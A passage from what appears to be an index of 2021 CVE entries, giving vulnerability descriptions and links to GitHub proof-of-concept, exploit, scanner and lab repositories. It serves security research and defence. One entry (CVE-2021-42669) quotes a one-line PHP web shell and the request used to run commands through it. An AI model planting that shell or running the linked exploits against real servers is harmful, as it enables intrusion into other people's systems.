[pirenga/CVE-2021-41773](https://github.com/pirenga/CVE-2021-41773) +- [kubota/POC-CVE-2021-41773](https://github.com/kubota/POC-CVE-2021-41773) +- [xMohamed0/CVE-2021-41773](https://github.com/xMohamed0/CVE-2021-41773) +- [i6c/MASS_CVE-2021-41773](https://github.com/i6c/MASS_CVE-2021-41773) +- [norrig/CVE-2021-41773-exploiter](https://github.com/norrig/CVE-2021-41773-exploiter) +- [m96dg/CVE-2021-41773-exercise](https://github.com/m96dg/CVE-2021-41773-exercise) +- [skentagon/CVE-2021-41773](https://github.com/skentagon/CVE-2021-41773) +- [mauricelambert/CVE-2021-41773](https://github.com/mauricelambert/CVE-2021-41773) +- [the29a/CVE-2021-41773](https://github.com/the29a/CVE-2021-41773) +- [thehackersbrain/CVE-2021-41773](https://github.com/thehackersbrain/CVE-2021-41773) +- [honypot/CVE-2021-41773](https://github.com/honypot/CVE-2021-41773) +- [Fa1c0n35/CVE-2021-41773](https://github.com/Fa1c0n35/CVE-2021-41773) +- [puckiestyle/CVE-2021-41773](https://github.com/puckiestyle/CVE-2021-41773) +- [zer0qs/CVE-2021-41773](https://github.com/zer0qs/CVE-2021-41773) +- [DoTuan1/Reserch-CVE-2021-41773](https://github.com/DoTuan1/Reserch-CVE-2021-41773) +- [bernardas/netsec-polygon](https://github.com/bernardas/netsec-polygon) +- [CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit) +- [vuongnv3389-sec/cve-2021-41773](https://github.com/vuongnv3389-sec/cve-2021-41773) +- [Chocapikk/CVE-2021-41773](https://github.com/Chocapikk/CVE-2021-41773) +- [wangfly-me/Apache_Penetration_Tool](https://github.com/wangfly-me/Apache_Penetration_Tool) +- [anldori/CVE-2021-41773-Scanner](https://github.com/anldori/CVE-2021-41773-Scanner) +- [iosifache/ApacheRCEEssay](https://github.com/iosifache/ApacheRCEEssay) +- [Habib0x0/CVE-2021-41773](https://github.com/Habib0x0/CVE-2021-41773) +- [pwn3z/CVE-2021-41773-Apache-RCE](https://github.com/pwn3z/CVE-2021-41773-Apache-RCE) +- [EkamSinghWalia/Mitigation-Apache-CVE-2021-41773-](https://github.com/EkamSinghWalia/Mitigation-Apache-CVE-2021-41773-) +- [Plunder283/CVE-2021-41773](https://github.com/Plunder283/CVE-2021-41773) +- [mightysai1997/cve-2021-41773](https://github.com/mightysai1997/cve-2021-41773) +- [mightysai1997/CVE-2021-41773h](https://github.com/mightysai1997/CVE-2021-41773h) +- [mightysai1997/cve-2021-41773-v-](https://github.com/mightysai1997/cve-2021-41773-v-) +- [mightysai1997/CVE-2021-41773-i-](https://github.com/mightysai1997/CVE-2021-41773-i-) +- [mightysai1997/CVE-2021-41773-L-](https://github.com/mightysai1997/CVE-2021-41773-L-) +- [mightysai1997/CVE-2021-41773-PoC](https://github.com/mightysai1997/CVE-2021-41773-PoC) +- [mightysai1997/CVE-2021-41773.git1](https://github.com/mightysai1997/CVE-2021-41773.git1) +- [mightysai1997/CVE-2021-41773m](https://github.com/mightysai1997/CVE-2021-41773m) +- [mightysai1997/CVE-2021-41773S](https://github.com/mightysai1997/CVE-2021-41773S) +- [dileepdkumar/LayarKacaSiber-CVE-2021-41773](https://github.com/dileepdkumar/LayarKacaSiber-CVE-2021-41773) +- [aqiao-jashell/CVE-2021-41773](https://github.com/aqiao-jashell/CVE-2021-41773) +- [aqiao-jashell/py-CVE-2021-41773](https://github.com/aqiao-jashell/py-CVE-2021-41773) +- [12345qwert123456/CVE-2021-41773](https://github.com/12345qwert123456/CVE-2021-41773) +- [blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution](https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution) +- [TheKernelPanic/exploit-apache2-cve-2021-41773](https://github.com/TheKernelPanic/exploit-apache2-cve-2021-41773) +- [retrymp3/apache2.4.49VulnerableLabSetup](https://github.com/retrymp3/apache2.4.49VulnerableLabSetup) +- [MatanelGordon/docker-cve-2021-41773](https://github.com/MatanelGordon/docker-cve-2021-41773) +- [0xGabe/Apache-CVEs](https://github.com/0xGabe/Apache-CVEs) +- [OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits](https://github.com/OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits) +- [belajarqywok/CVE-2021-41773-MSF](https://github.com/belajarqywok/CVE-2021-41773-MSF) +- [Iris288/CVE-2021-41773](https://github.com/Iris288/CVE-2021-41773) +- [Maybe4a6f7365/CVE-2021-41773](https://github.com/Maybe4a6f7365/CVE-2021-41773) +- [Zyx2440/Apache-HTTP-Server-2.4.50-RCE](https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE) +- [0xc4t/CVE-2021-41773](https://github.com/0xc4t/CVE-2021-41773) +- [jkska23/Additive-Vulnerability-Analysis-CVE-2021-41773](https://github.com/jkska23/Additive-Vulnerability-Analysis-CVE-2021-41773) + +### CVE-2021-41784 (2022-08-29) + +Foxit PDF Reader before 11.1 and PDF Editor before 11.1, and PhantomPDF before 10.1.6, allow attackers to trigger a use-after-free and execute arbitrary code because JavaScript is mishandled. + + +- [Jeromeyoung/CVE-2021-41784](https://github.com/Jeromeyoung/CVE-2021-41784) + +### CVE-2021-41805 (2021-12-12) + +HashiCorp Consul Enterprise before 1.8.17, 1.9.x before 1.9.11, and 1.10.x before 1.10.4 has Incorrect Access Control. An ACL token (with the default operator:write permissions) in one namespace can be used for unintended privilege escalation in a different namespace. + + +- [blackm4c/CVE-2021-41805](https://github.com/blackm4c/CVE-2021-41805) + +### CVE-2021-41822 +- [badboycxcc/CVE-2021-41822](https://github.com/badboycxcc/CVE-2021-41822) + +### CVE-2021-41946 (2022-05-18) + +In FiberHome VDSL2 Modem HG150-Ub_V3.0, a stored cross-site scripting (XSS) vulnerability in Parental Control --> Access Time Restriction --> Username field, a user cannot delete the rule due to the XSS. + + +- [afaq1337/CVE-2021-41946](https://github.com/afaq1337/CVE-2021-41946) + +### CVE-2021-41962 (2021-12-16) + +Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Owner fullname parameter in a Send Service Request in vehicle_service. + + +- [lohyt/-CVE-2021-41962](https://github.com/lohyt/-CVE-2021-41962) + +### CVE-2021-42008 (2021-10-04) + +The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access. + + +- [numanturle/CVE-2021-42008](https://github.com/numanturle/CVE-2021-42008) +- [0xdevil/CVE-2021-42008](https://github.com/0xdevil/CVE-2021-42008) + +### CVE-2021-42013 (2021-10-07) + +It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. + + +- [andrea-mattioli/apache-exploit-CVE-2021-42013](https://github.com/andrea-mattioli/apache-exploit-CVE-2021-42013) +- [Vulnmachines/cve-2021-42013](https://github.com/Vulnmachines/cve-2021-42013) +- [twseptian/cve-2021-42013-docker-lab](https://github.com/twseptian/cve-2021-42013-docker-lab) +- [LayarKacaSiber/CVE-2021-42013](https://github.com/LayarKacaSiber/CVE-2021-42013) +- [TheLastVvV/CVE-2021-42013](https://github.com/TheLastVvV/CVE-2021-42013) +- [TheLastVvV/CVE-2021-42013_Reverse-Shell](https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell) +- [walnutsecurity/cve-2021-42013](https://github.com/walnutsecurity/cve-2021-42013) +- [robotsense1337/CVE-2021-42013](https://github.com/robotsense1337/CVE-2021-42013) +- [xMohamed0/CVE-2021-42013-ApacheRCE](https://github.com/xMohamed0/CVE-2021-42013-ApacheRCE) +- [asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp](https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp) +- [jas9reet/CVE-2021-42013-LAB](https://github.com/jas9reet/CVE-2021-42013-LAB) +- [mauricelambert/CVE-2021-42013](https://github.com/mauricelambert/CVE-2021-42013) +- [honypot/CVE-2021-42013](https://github.com/honypot/CVE-2021-42013) +- [hadrian3689/apache_2.4.50](https://github.com/hadrian3689/apache_2.4.50) +- [viliuspovilaika/cve-2021-42013](https://github.com/viliuspovilaika/cve-2021-42013) +- [mightysai1997/cve-2021-42013](https://github.com/mightysai1997/cve-2021-42013) +- [mightysai1997/cve-2021-42013L](https://github.com/mightysai1997/cve-2021-42013L) +- [mightysai1997/cve-2021-42013.get](https://github.com/mightysai1997/cve-2021-42013.get) +- [12345qwert123456/CVE-2021-42013](https://github.com/12345qwert123456/CVE-2021-42013) +- [cybfar/cve-2021-42013-httpd](https://github.com/cybfar/cve-2021-42013-httpd) +- [vudala/CVE-2021-42013](https://github.com/vudala/CVE-2021-42013) +- [Hamesawian/CVE-2021-42013](https://github.com/Hamesawian/CVE-2021-42013) +- [K3ysTr0K3R/CVE-2021-42013-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-42013-EXPLOIT) +- [BassoNicolas/CVE-2021-42013](https://github.com/BassoNicolas/CVE-2021-42013) +- [rafifdna/CVE-2021-42013](https://github.com/rafifdna/CVE-2021-42013) +- [dream434/cve-2021-42013-apache](https://github.com/dream434/cve-2021-42013-apache) +- [bananoname/cve-2021-42013](https://github.com/bananoname/cve-2021-42013) + +### CVE-2021-42056 (2022-06-24) + +Thales Safenet Authentication Client (SAC) for Linux and Windows through 10.7.7 creates insecure temporary hid and lock files allowing a local attacker, through a symlink attack, to overwrite arbitrary files, and potentially achieve arbitrary command execution with high privileges. + + +- [z00z00z00/Safenet_SAC_CVE-2021-42056](https://github.com/z00z00z00/Safenet_SAC_CVE-2021-42056) + +### CVE-2021-42063 (2021-12-14) + +A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to disclose sensitive data. + + +- [Cappricio-Securities/CVE-2021-42063](https://github.com/Cappricio-Securities/CVE-2021-42063) + +### CVE-2021-42071 (2021-10-07) + +In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header. + + +- [adubaldo/CVE-2021-42071](https://github.com/adubaldo/CVE-2021-42071) + +### CVE-2021-42171 (2022-03-14) + +Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth. + + +- [minhnq22/CVE-2021-42171](https://github.com/minhnq22/CVE-2021-42171) + +### CVE-2021-42183 (2022-05-05) + +MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/. + + +- [0xRaw/CVE-2021-42183](https://github.com/0xRaw/CVE-2021-42183) + +### CVE-2021-42205 (2022-11-07) + +ELAN Miniport touchpad Windows driver before 24.21.51.2, as used in PC hardware from multiple manufacturers, allows local users to cause a system crash by sending a certain IOCTL request, because that request is handled twice. + + +- [gmh5225/CVE-2021-42205](https://github.com/gmh5225/CVE-2021-42205) + +### CVE-2021-42230 (2022-04-15) + +Seowon 130-SLC router all versions as of 2021-09-15 is vulnerable to Remote Code Execution via the queriesCnt parameter. + + +- [TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated) + +### CVE-2021-42237 (2021-11-05) + +Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. + + +- [ItsIgnacioPortal/CVE-2021-42237](https://github.com/ItsIgnacioPortal/CVE-2021-42237) +- [vesperp/CVE-2021-42237-SiteCore-XP](https://github.com/vesperp/CVE-2021-42237-SiteCore-XP) +- [crankyyash/SiteCore-RCE-Detection](https://github.com/crankyyash/SiteCore-RCE-Detection) + +### CVE-2021-42261 (2021-10-19) + +Revisor Video Management System (VMS) before 2.0.0 has a directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of restricted directory on the remote server. This could lead to the disclosure of sensitive data on the vulnerable server. + + +- [jet-pentest/CVE-2021-42261](https://github.com/jet-pentest/CVE-2021-42261) + +### CVE-2021-42278 (2021-11-10) + +Active Directory Domain Services Elevation of Privilege Vulnerability + + +- [safebuffer/sam-the-admin](https://github.com/safebuffer/sam-the-admin) +- [Ridter/noPac](https://github.com/Ridter/noPac) +- [waterrr/noPac](https://github.com/waterrr/noPac) +- [ly4k/Pachine](https://github.com/ly4k/Pachine) +- [cybersecurityworks553/noPac-detection](https://github.com/cybersecurityworks553/noPac-detection) + +### CVE-2021-42287 (2021-11-10) + +Active Directory Domain Services Elevation of Privilege Vulnerability + + +- [cube0x0/noPac](https://github.com/cube0x0/noPac) +- [ricardojba/Invoke-noPac](https://github.com/ricardojba/Invoke-noPac) +- [knightswd/NoPacScan](https://github.com/knightswd/NoPacScan) +- [XiaoliChan/Invoke-sAMSpoofing](https://github.com/XiaoliChan/Invoke-sAMSpoofing) +- [TryA9ain/noPac](https://github.com/TryA9ain/noPac) + +### CVE-2021-42292 (2021-11-10) + +Microsoft Excel Security Feature Bypass Vulnerability + + +- [corelight/CVE-2021-42292](https://github.com/corelight/CVE-2021-42292) + +### CVE-2021-42321 (2021-11-10) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [DarkSprings/CVE-2021-42321](https://github.com/DarkSprings/CVE-2021-42321) +- [xnyuq/cve-2021-42321](https://github.com/xnyuq/cve-2021-42321) +- [7BitsTeam/exch_CVE-2021-42321](https://github.com/7BitsTeam/exch_CVE-2021-42321) + +### CVE-2021-42325 (2021-10-12) + +Froxlor through 0.10.29.1 allows SQL injection in Database/Manager/DbManagerMySQL.php via a custom DB name. + + +- [AK-blank/CVE-2021-42325-](https://github.com/AK-blank/CVE-2021-42325-) + +### CVE-2021-42327 (2021-10-21) + +dp_link_settings_write in drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c in the Linux kernel through 5.14.14 allows a heap-based buffer overflow by an attacker who can write a string to the AMD GPU display drivers debug filesystem. There are no checks on size within parse_write_buffer_into_params when it uses the size of copy_from_user to copy a userspace buffer into a 40-byte heap buffer. + + +- [docfate111/CVE-2021-42327](https://github.com/docfate111/CVE-2021-42327) + +### CVE-2021-42342 (2021-10-14) + +An issue was discovered in GoAhead 4.x and 5.x before 5.1.5. In the file upload filter, user form variables can be passed to CGI scripts without being prefixed with the CGI prefix. This permits tunneling untrusted environment variables into vulnerable CGI scripts. + + +- [kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-](https://github.com/kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-) +- [ijh4723/-zeroboo-Gohead-CVE-2021-42342-1](https://github.com/ijh4723/-zeroboo-Gohead-CVE-2021-42342-1) + +### CVE-2021-42362 (2021-11-17) + +The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2. + + +- [simonecris/CVE-2021-42362-PoC](https://github.com/simonecris/CVE-2021-42362-PoC) + +### CVE-2021-42392 (2022-01-07) + +The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console which leads to unauthenticated remote code execution. + + +- [cybersecurityworks553/CVE-2021-42392-Detect](https://github.com/cybersecurityworks553/CVE-2021-42392-Detect) + +### CVE-2021-42558 (2022-01-12) + +An issue was discovered in CALDERA 2.8.1. It contains multiple reflected, stored, and self XSS vulnerabilities that may be exploited by authenticated and unauthenticated attackers. + + +- [mbadanoiu/CVE-2021-42558](https://github.com/mbadanoiu/CVE-2021-42558) + +### CVE-2021-42559 (2022-01-12) + +An issue was discovered in CALDERA 2.8.1. It contains multiple startup "requirements" that execute commands when starting the server. Because these commands can be changed via the REST API, an authenticated user can insert arbitrary commands that will execute when the server is restarted. + + +- [mbadanoiu/CVE-2021-42559](https://github.com/mbadanoiu/CVE-2021-42559) + +### CVE-2021-42560 (2022-01-12) + +An issue was discovered in CALDERA 2.9.0. The Debrief plugin receives base64 encoded "SVG" parameters when generating a PDF document. These SVG documents are parsed in an unsafe manner and can be leveraged for XXE attacks (e.g., File Exfiltration, Server Side Request Forgery, Out of Band Exfiltration, etc.). + + +- [mbadanoiu/CVE-2021-42560](https://github.com/mbadanoiu/CVE-2021-42560) + +### CVE-2021-42561 (2022-01-12) + +An issue was discovered in CALDERA 2.8.1. When activated, the Human plugin passes the unsanitized name parameter to a python "os.system" function. This allows attackers to use shell metacharacters (e.g., backticks "``" or dollar parenthesis "$()" ) in order to escape the current command and execute arbitrary shell commands. + + +- [mbadanoiu/CVE-2021-42561](https://github.com/mbadanoiu/CVE-2021-42561) + +### CVE-2021-42562 (2022-01-12) + +An issue was discovered in CALDERA 2.8.1. It does not properly segregate user privileges, resulting in non-admin users having access to read and modify configuration or other components that should only be accessible by admin users. + + +- [mbadanoiu/CVE-2021-42562](https://github.com/mbadanoiu/CVE-2021-42562) + +### CVE-2021-42574 (2021-11-01) + +An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-right and right-to-left characters, the visual order of tokens may be different from their logical order. Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm. + + +- [shiomiyan/CVE-2021-42574](https://github.com/shiomiyan/CVE-2021-42574) +- [hffaust/CVE-2021-42574_and_CVE-2021-42694](https://github.com/hffaust/CVE-2021-42574_and_CVE-2021-42694) +- [simplylu/CVE-2021-42574](https://github.com/simplylu/CVE-2021-42574) +- [maweil/bidi_char_detector](https://github.com/maweil/bidi_char_detector) +- [pierDipi/unicode-control-characters-action](https://github.com/pierDipi/unicode-control-characters-action) +- [waseeld/CVE-2021-42574](https://github.com/waseeld/CVE-2021-42574) +- [tin-z/solidity_CVE-2021-42574-POC](https://github.com/tin-z/solidity_CVE-2021-42574-POC) + +### CVE-2021-42662 (2021-11-05) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the Holiday reason parameter. An attacker can leverage this vulnerability in order to run javascript commands on the web server surfers behalf, which can lead to cookie stealing and more. + + +- [0xDeku/CVE-2021-42662](https://github.com/0xDeku/CVE-2021-42662) + +### CVE-2021-42663 (2021-11-05) + +An HTML injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link he will display the content of the HTML code of the attacker's choice. + + +- [0xDeku/CVE-2021-42663](https://github.com/0xDeku/CVE-2021-42663) + +### CVE-2021-42664 (2021-11-05) + +A Stored Cross Site Scripting (XSS) Vulneraibiilty exists in Sourcecodester Engineers Online Portal in PHP via the (1) Quiz title and (2) quiz description parameters to add_quiz.php. An attacker can leverage this vulnerability in order to run javascript commands on the web server surfers behalf, which can lead to cookie stealing and more. + + +- [0xDeku/CVE-2021-42664](https://github.com/0xDeku/CVE-2021-42664) + +### CVE-2021-42665 (2021-11-05) + +An SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the login form inside of index.php, which can allow an attacker to bypass authentication. + + +- [0xDeku/CVE-2021-42665](https://github.com/0xDeku/CVE-2021-42665) + +### CVE-2021-42666 (2021-11-05) + +A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to quiz_question.php, which could let a malicious user extract sensitive data from the web server and in some cases use this vulnerability in order to get a remote code execution on the remote web server. + + +- [0xDeku/CVE-2021-42666](https://github.com/0xDeku/CVE-2021-42666) + +### CVE-2021-42667 (2021-11-05) + +A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server. + + +- [0xDeku/CVE-2021-42667](https://github.com/0xDeku/CVE-2021-42667) + +### CVE-2021-42668 (2021-11-05) + +A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter in the my_classmates.php web page.. As a result, an attacker can extract sensitive data from the web server and in some cases can use this vulnerability in order to get a remote code execution on the remote web server. + + +- [0xDeku/CVE-2021-42668](https://github.com/0xDeku/CVE-2021-42668) + +### CVE-2021-42669 (2021-11-05) + +A file upload vulnerability exists in Sourcecodester Engineers Online Portal in PHP via dashboard_teacher.php, which allows changing the avatar through teacher_avatar.php. Once an avatar gets uploaded it is getting uploaded to the /admin/uploads/ directory, and is accessible by all users. By uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" the attacker can execute commands on the web server with - /admin/uploads/php-webshell?cmd=id. + + +- [0xDeku/CVE-2021-42669](https://github.com/0xDeku/CVE-2021-42669) + +### CVE-2021-42670 (2021-11-05) + +A SQL injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to the announcements_student.php web page. As a result a malicious user can extract sensitive data from the web server and in some cases use this vulnerability in order to get a remote code execution on the remote web server. + + +- [0xDeku/CVE-2021-42670](https://github.com/0xDeku/CVE-2021-42670) + +### CVE-2021-42671 (2021-11-05) + +An incorrect access control vulnerability exists in Sourcecodester Engineers Online Portal in PHP in nia_munoz_monitoring_system/admin/uploads. An attacker can leverage this vulnerability in order to bypass access controls and access all the files uploaded to the web server without the need of authentication or authorization. + + +- [0xDeku/CVE-2021-42671](https://github.com/0xDeku/CVE-2021-42671) + +### CVE-2021-42694 (2021-11-01) + +An issue was discovered in the character definitions of the Unicode Specification through 14.0. The specification allows an adversary to produce source code identifiers such as function names using homoglyphs that render visually identical to a target identifier. Adversaries can leverage this to inject code via adversarial identifier definitions in upstream software dependencies invoked deceptively in downstream software. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard (all versions). Unless mitigated, an adversary could produce source code identifiers using homoglyph characters that render visually identical to but are distinct from a target identifier. In this way, an adversary could inject adversarial identifier definitions in upstream software that are not detected by human reviewers and are invoked deceptively in downstream software. The Unicode Consortium has documented this class of security vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms. + + +- [simplylu/CVE-2021-42694](https://github.com/simplylu/CVE-2021-42694) + +### CVE-2021-42697 (2021-11-02) + +Akka HTTP 10.1.x before 10.1.15 and 10.2.x before 10.2.7 can encounter stack exhaustion while parsing HTTP headers, which allows a remote attacker to conduct a Denial of Service attack by sending a User-Agent header with deeply nested comments. + + +- [cxosmo/CVE-2021-42697](https://github.com/cxosmo/CVE-2021-42697) + +### CVE-2021-42717 (2021-12-07) + +ModSecurity 3.x through 3.0.5 mishandles excessively nested JSON objects. Crafted JSON objects with nesting tens-of-thousands deep could result in the web server being unable to service legitimate requests. Even a moderately large (e.g., 300KB) HTTP request can occupy one of the limited NGINX worker processes for minutes and consume almost all of the available CPU on the machine. Modsecurity 2 is similarly vulnerable: the affected versions include 2.8.0 through 2.9.4. + + +- [EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717](https://github.com/EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717) + +### CVE-2021-42756 (2023-02-16) + +Multiple stack-based buffer overflow vulnerabilities [CWE-121] in the proxy daemon of FortiWeb 5.x all versions, 6.0.7 and below, 6.1.2 and below, 6.2.6 and below, 6.3.16 and below, 6.4 all versions may allow an unauthenticated remote attacker to achieve arbitrary code execution via specifically crafted HTTP requests. + + +- [3ndorph1n/CVE-2021-42756](https://github.com/3ndorph1n/CVE-2021-42756) + +### CVE-2021-42835 (2021-12-08) + +An issue was discovered in Plex Media Server through 1.24.4.5081-e362dc1ee. An attacker (with a foothold in a endpoint via a low-privileged user account) can access the exposed RPC service of the update service component. This RPC functionality allows the attacker to interact with the RPC functionality and execute code from a path of his choice (local, or remote via SMB) because of a TOCTOU race condition. This code execution is in the context of the Plex update service (which runs as SYSTEM). + + +- [netanelc305/PlEXcalaison](https://github.com/netanelc305/PlEXcalaison) + +### CVE-2021-42913 (2021-12-20) + +The SyncThru Web Service on Samsung SCX-6x55X printers allows an attacker to gain access to a list of SMB users and cleartext passwords by reading the HTML source code. Authentication is not required. + + +- [kernel-cyber/CVE-2021-42913](https://github.com/kernel-cyber/CVE-2021-42913) + +### CVE-2021-42948 (2022-09-16) + +HotelDruid Hotel Management Software v3.0.3 and below was discovered to have exposed session tokens in multiple links via GET parameters, allowing attackers to access user session id's. + + +- [dhammon/HotelDruid-CVE-2021-42948](https://github.com/dhammon/HotelDruid-CVE-2021-42948) + +### CVE-2021-42949 (2022-09-16) + +The component controlla_login function in HotelDruid Hotel Management Software v3.0.3 generates a predictable session token, allowing attackers to bypass authentication via bruteforce attacks. + + +- [dhammon/HotelDruid-CVE-2021-42949](https://github.com/dhammon/HotelDruid-CVE-2021-42949) + +### CVE-2021-43008 (2022-04-05) + +Improper Access Control in Adminer versions 1.12.0 to 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the remote server by requesting the Adminer to connect to a remote MySQL database. + + +- [p0dalirius/CVE-2021-43008-AdminerRead](https://github.com/p0dalirius/CVE-2021-43008-AdminerRead) + +### CVE-2021-43032 (2021-11-03) + +In XenForo through 2.2.7, a threat actor with access to the admin panel can create a new Advertisement via the Advertising function, and save an XSS payload in the body of the HTML document. This payload will execute globally on the client side. + + +- [SakuraSamuraii/CVE-2021-43032](https://github.com/SakuraSamuraii/CVE-2021-43032) + +### CVE-2021-43129 (2022-04-19) + +A bypass exists for Desire2Learn/D2L Brightspace’s “Disable Right Click” option in the quizzing feature, which allows a quiz-taker to access print and copy functionality via the browser’s right click menu even when “Disable Right Click” is enabled on the quiz. + + +- [Skotizo/CVE-2021-43129](https://github.com/Skotizo/CVE-2021-43129) + +### CVE-2021-43141 (2021-11-03) + +Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in plan_application. + + +- [Jeromeyoung/CVE-2021-43141](https://github.com/Jeromeyoung/CVE-2021-43141) + +### CVE-2021-43217 (2021-12-15) + +Windows Encrypting File System (EFS) Remote Code Execution Vulnerability + + +- [JolynNgSC/EFS_CVE-2021-43217](https://github.com/JolynNgSC/EFS_CVE-2021-43217) + +### CVE-2021-43224 (2021-12-15) + +Windows Common Log File System Driver Information Disclosure Vulnerability + + +- [KaLendsi/CVE-2021-43224-POC](https://github.com/KaLendsi/CVE-2021-43224-POC) + +### CVE-2021-43226 (2021-12-15) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [Rosayxy/cve-2021-43226PoC](https://github.com/Rosayxy/cve-2021-43226PoC) + +### CVE-2021-43229 (2021-12-15) + +Windows NTFS Elevation of Privilege Vulnerability + + +- [Citizen13X/CVE-2021-43229](https://github.com/Citizen13X/CVE-2021-43229) + +### CVE-2021-43258 (2022-11-23) + +CartView.php in ChurchInfo 1.3.0 allows attackers to achieve remote code execution through insecure uploads. This requires authenticated access tot he ChurchInfo application. Once authenticated, a user can add names to their cart, and compose an email. Uploading an attachment for the email stores the attachment on the site in the /tmp_attach/ folder where it can be accessed with a GET request. There are no limitations on files that can be attached, allowing for malicious PHP code to be uploaded and interpreted by the server. + + +- [MRvirusIR/CVE-2021-43258](https://github.com/MRvirusIR/CVE-2021-43258) + +### CVE-2021-43267 (2021-11-02) + +An issue was discovered in net/tipc/crypto.c in the Linux kernel before 5.14.16. The Transparent Inter-Process Communication (TIPC) functionality allows remote attackers to exploit insufficient validation of user-supplied sizes for the MSG_CRYPTO message type. + + +- [DarkSprings/CVE-2021-43267-POC](https://github.com/DarkSprings/CVE-2021-43267-POC) +- [zzhacked/CVE-2021-43267](https://github.com/zzhacked/CVE-2021-43267) + +### CVE-2021-43287 (2022-04-14) + +An issue was discovered in ThoughtWorks GoCD before 21.3.0. The business continuity add-on, which is enabled by default, leaks all secrets known to the GoCD server to unauthenticated attackers. + + 